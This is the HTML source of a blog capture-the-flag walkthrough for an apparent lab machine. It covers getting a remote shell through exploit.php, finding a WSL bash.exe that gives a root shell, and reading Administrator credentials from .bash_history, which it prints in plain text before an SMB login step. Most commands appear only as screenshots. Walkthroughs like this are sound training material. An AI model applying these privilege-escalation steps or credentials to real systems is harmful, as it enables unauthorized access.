&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Running &lt;b&gt;exploit.php&lt;/b&gt; directly on the browser:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhY7Xfe99fuI3Rx_Nd63na4IktqzjpQAJu593JeXrX631f71nMkUc9iUWpFqh4FFtYmZHB1VBrE647eXzUq_vx-X0JV9yogbK8FQ9sm0Tun0eRjLqqKVuGzP3hhoqfutFsGUHoD9OMICZQx/s1600/screenshot.28.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhY7Xfe99fuI3Rx_Nd63na4IktqzjpQAJu593JeXrX631f71nMkUc9iUWpFqh4FFtYmZHB1VBrE647eXzUq_vx-X0JV9yogbK8FQ9sm0Tun0eRjLqqKVuGzP3hhoqfutFsGUHoD9OMICZQx/s1600/screenshot.28.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- A remote shell is successfully spawned:&lt;/span&gt;&lt;br /&gt;

&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGIgoc2fj64v9wjKxvt5CimF6cjjTVbBDB-WdLhDObKlHKZ-Dr-cljbFGheu38hhZrQhSNM_pfe09LcI7HMVDmRPdxLapfrf6lId-biMliNhxzuYEmW5cHL6u15A85w_A9vY7OFRJdbGHc/s1600/screenshot.29.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGIgoc2fj64v9wjKxvt5CimF6cjjTVbBDB-WdLhDObKlHKZ-Dr-cljbFGheu38hhZrQhSNM_pfe09LcI7HMVDmRPdxLapfrf6lId-biMliNhxzuYEmW5cHL6u15A85w_A9vY7OFRJdbGHc/s1600/screenshot.29.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMmL_Y-QtQIeGoSqTAWMs97qRE0RnSPWqImgKNZ5FOMfcNhwxHoPgw06A_F8Kf8fuSMuALmIWjGOmefw6tJBwKuKq-sZZHwIfXV6jBPh-IhGSdy7KM5n9CHYhmBCPsXOKUtlhmM6E-0OGc/s1600/screenshot.30.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMmL_Y-QtQIeGoSqTAWMs97qRE0RnSPWqImgKNZ5FOMfcNhwxHoPgw06A_F8Kf8fuSMuALmIWjGOmefw6tJBwKuKq-sZZHwIfXV6jBPh-IhGSdy7KM5n9CHYhmBCPsXOKUtlhmM6E-0OGc/s400/screenshot.30.jpg&quot; /&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: #3d85c6; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;4 - CAPTURING THE 1st FLAG&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Reading &lt;b&gt;user.txt&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;

&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjazSKcFHch6d2DPMBNm_dYJTPjRgaMm9uw7Z0K5nC7Cfr8aZyNybeEbFWVC65x2bYVkgMX8lBt2pUUFyjUu4Xrg8vaC1rCrgRQr1-b8YjdPMtWxw3EDR6ceNp91oStBO40hdQb3HvAXB_Z/s1600/screenshot.31.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjazSKcFHch6d2DPMBNm_dYJTPjRgaMm9uw7Z0K5nC7Cfr8aZyNybeEbFWVC65x2bYVkgMX8lBt2pUUFyjUu4Xrg8vaC1rCrgRQr1-b8YjdPMtWxw3EDR6ceNp91oStBO40hdQb3HvAXB_Z/s1600/screenshot.31.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;color: #3d85c6;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;5&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- PRIVILEGE ESCALATION&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Access to &lt;b&gt;Administrator&lt;/b&gt;&#39;s account is denied, as expected, so we need &lt;b&gt;Privilege Escalation&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;

&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkrB4eqzsTRmNRtJt92ymprLf6X8xzjPGRJAHGaA97gDk6k4ZGkjuIZl8O6vFy2cDRaTJAxAZSFSZRzn0vvDHnsE1zdURcIw7-eJQVNgsk_WTeyLHieRWbXRfRRWttdgC1LI6XqP-f7tjq/s1600/screenshot.32.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkrB4eqzsTRmNRtJt92ymprLf6X8xzjPGRJAHGaA97gDk6k4ZGkjuIZl8O6vFy2cDRaTJAxAZSFSZRzn0vvDHnsE1zdURcIw7-eJQVNgsk_WTeyLHieRWbXRfRRWttdgC1LI6XqP-f7tjq/s400/screenshot.32.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Checking user &lt;b&gt;tyler&lt;/b&gt;&#39;s &lt;b&gt;Desktop&lt;/b&gt; there is a file &lt;b&gt;bash.lnk:&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsGWQgA-QU11YZip1J9rCGRm9qW0BWQbQOMuLDU4uILC4m5K47rm3tAH8oUKL4TEUwiXet8oWhhbH8de1UVcb11V6jdLQacN8_xo4riy19I-FWuuBiaiK8BMMgF2bkmj1PMscpYorHn2zf/s1600/screenshot.33.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsGWQgA-QU11YZip1J9rCGRm9qW0BWQbQOMuLDU4uILC4m5K47rm3tAH8oUKL4TEUwiXet8oWhhbH8de1UVcb11V6jdLQacN8_xo4riy19I-FWuuBiaiK8BMMgF2bkmj1PMscpYorHn2zf/s1600/screenshot.33.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;- &lt;b&gt;Windows Subsystem for Linux (WSL)&lt;/b&gt; is a compatibility layer for running Linux binary executables (in ELF format) natively on Windows 10 and Windows Server 2019.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&lt;a href=&quot;https://en.wikipedia.org/wiki/Windows_Subsystem_for_Linux&quot;&gt;https://en.wikipedia.org/wiki/Windows_Subsystem_for_Linux&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Reading &lt;b&gt;bash.lnk&lt;/b&gt; the path&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;C:&lt;/b&gt;&lt;b style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;\Windows\System32\bash.exe&lt;/b&gt;&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt; seems to be interesting:&lt;/span&gt;&lt;br /&gt;

&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQBS2FPsr37Y4gBavMX36Lk0_GETO6SHjS8J7HghFtjW24eRYDMtU-A16G6w4Tl_ud-zxsARn89aOZf16dPjr-xnFZXl-gLpO2-FY0lPQyG3bGHvwOF8wpE3QkQbHfXjTx5M9Z92frSv7P/s1600/screenshot.35.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQBS2FPsr37Y4gBavMX36Lk0_GETO6SHjS8J7HghFtjW24eRYDMtU-A16G6w4Tl_ud-zxsARn89aOZf16dPjr-xnFZXl-gLpO2-FY0lPQyG3bGHvwOF8wpE3QkQbHfXjTx5M9Z92frSv7P/s1600/screenshot.35.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- However the clue is false because there is no &lt;b&gt;bash.exe&lt;/b&gt; at &lt;b&gt;C:\Windows\System32&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2WrpdYYAlCvXUX33R-2oZDtRWu0S6is_zx09K9_S0TmDPTmm7ycoI94ds9jUi618cwnd258LoGx2cN3QqCqjM5WXUDknYARbFU2HB_I0Czt6l1QUMRGrTaFtpL3Ijgv65kS5s5CtlYt8T/s1600/screenshot.36.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2WrpdYYAlCvXUX33R-2oZDtRWu0S6is_zx09K9_S0TmDPTmm7ycoI94ds9jUi618cwnd258LoGx2cN3QqCqjM5WXUDknYARbFU2HB_I0Czt6l1QUMRGrTaFtpL3Ijgv65kS5s5CtlYt8T/s1600/screenshot.36.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Let&#39;s find real location for &lt;b&gt;bash.exe&lt;/b&gt;:&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5UFsQK7rVczpRkhJ5BWjxRbJRxYHMea0e6jDw2visdO8QSOsLDz2srHInZp9DHmJiaZfSW1HBghD0xURCNg14ElEXMnzfh0xFCtv2PUNzUhustT2eqhuSz4otcJo1M6tjc0iV7XA-ckTE/s1600/screenshot.37.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5UFsQK7rVczpRkhJ5BWjxRbJRxYHMea0e6jDw2visdO8QSOsLDz2srHInZp9DHmJiaZfSW1HBghD0xURCNg14ElEXMnzfh0xFCtv2PUNzUhustT2eqhuSz4otcJo1M6tjc0iV7XA-ckTE/s1600/screenshot.37.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Running &lt;b&gt;bash.exe&lt;/b&gt; we get a &lt;b&gt;root&lt;/b&gt;&amp;nbsp;shell for the&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;Windows Subsystem for Linux (WSL)&lt;/b&gt;&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlwaLej9SsDhGq9utzQYvoqfxUmOdxkYL3gHK_A4k1PtWNu9J-XHslYPjdiGRvtFABhsdGcz8n85gpxk9q8ptWN39z485NBiFUzRgdj7z9vKwRYsSk7dfDwDbXHgMIdhO6YG_b9e2OhM6l/s1600/screenshot.39.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlwaLej9SsDhGq9utzQYvoqfxUmOdxkYL3gHK_A4k1PtWNu9J-XHslYPjdiGRvtFABhsdGcz8n85gpxk9q8ptWN39z485NBiFUzRgdj7z9vKwRYsSk7dfDwDbXHgMIdhO6YG_b9e2OhM6l/s1600/screenshot.39.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Improving the shell:&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiexD05tmSUnrFX45E5nuS6D4O8V1-xXAYPrBj0s-eo7BM4P1iVCFm4AqUSYYNM123j2-5yytJmCVK5cGNIHrMdwuyejFYIrz0pcqD4HLgYFdCzmB1gB7_zokG1vnnkQEhpl3d81cBxVRF8/s1600/screenshot.52.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiexD05tmSUnrFX45E5nuS6D4O8V1-xXAYPrBj0s-eo7BM4P1iVCFm4AqUSYYNM123j2-5yytJmCVK5cGNIHrMdwuyejFYIrz0pcqD4HLgYFdCzmB1gB7_zokG1vnnkQEhpl3d81cBxVRF8/s1600/screenshot.52.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Checking content of &lt;b&gt;root&lt;/b&gt;&amp;nbsp; home folder there is the hidden file &lt;b&gt;.bash_history&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmHtMRTWp8Wc0UQB_kGy9SLj1whmDEBlVpU9fEZRNnmiVYFvgGV9XA6e_MqPegH65wmRXP4TFGPD04R-ebVFpgs7kTwF30ueS6LJtTr0uGoKIuDu7GqBGhSh4E4ou8RWyedfF0UDY8NqAK/s1600/screenshot.42.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmHtMRTWp8Wc0UQB_kGy9SLj1whmDEBlVpU9fEZRNnmiVYFvgGV9XA6e_MqPegH65wmRXP4TFGPD04R-ebVFpgs7kTwF30ueS6LJtTr0uGoKIuDu7GqBGhSh4E4ou8RWyedfF0UDY8NqAK/s1600/screenshot.42.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Reading&amp;nbsp;&lt;b&gt;.bash_history&lt;/b&gt;&amp;nbsp;credentials for &lt;b&gt;Administrator&lt;/b&gt;&amp;nbsp;are available:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBTM0hxQLLK0iywhJ9Ntr1LTagG97uIZwDUGAHlUTmvA7zvhlrH1XigWiZaelYORsTMzpXIcog6ukq5O7mbPBIDJ9KB76py_fF1bxhy-Q950waMCzrA3Y-G3ei5hiPkw6mgo-CMAr3L10p/s1600/screenshot.43.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBTM0hxQLLK0iywhJ9Ntr1LTagG97uIZwDUGAHlUTmvA7zvhlrH1XigWiZaelYORsTMzpXIcog6ukq5O7mbPBIDJ9KB76py_fF1bxhy-Q950waMCzrA3Y-G3ei5hiPkw6mgo-CMAr3L10p/s1600/screenshot.43.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Making use of credentials&amp;nbsp;&lt;b&gt;administrator%u6!4ZwgwOM#^OBf#Nwnh&lt;/b&gt; there are two ways of accessing the&amp;nbsp;&lt;b&gt;Administrator&lt;/b&gt;&#39;s account:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: #3d85c6; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;5.1 - Smbclient&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Connecting with the SMB service:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;

&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4hB5y_j_5_e-kO3z9e0OJYlJ7ugfnbyPiAbw44EmlaijlMtEzQtHBtZA2JAedC3QUaNfbz_I_fRiC_ZbI-0J5BQ5lk8oZ9WioO8cpn-sl16VRUVTBBla69pk4JoRqCeh4QjAhkBkHTpW9/s1600/screenshot.44.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4hB5y_j_5_e-kO3z9e0OJYlJ7ugfnbyPiAbw44EmlaijlMtEzQtHBtZA2JAedC3QUaNfbz_I_fRiC_ZbI-0J5BQ5lk8oZ9WioO8cpn-sl16VRUVTBBla69pk4JoRqCeh4QjAhkBkHTpW9/s1600/screenshot.44.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
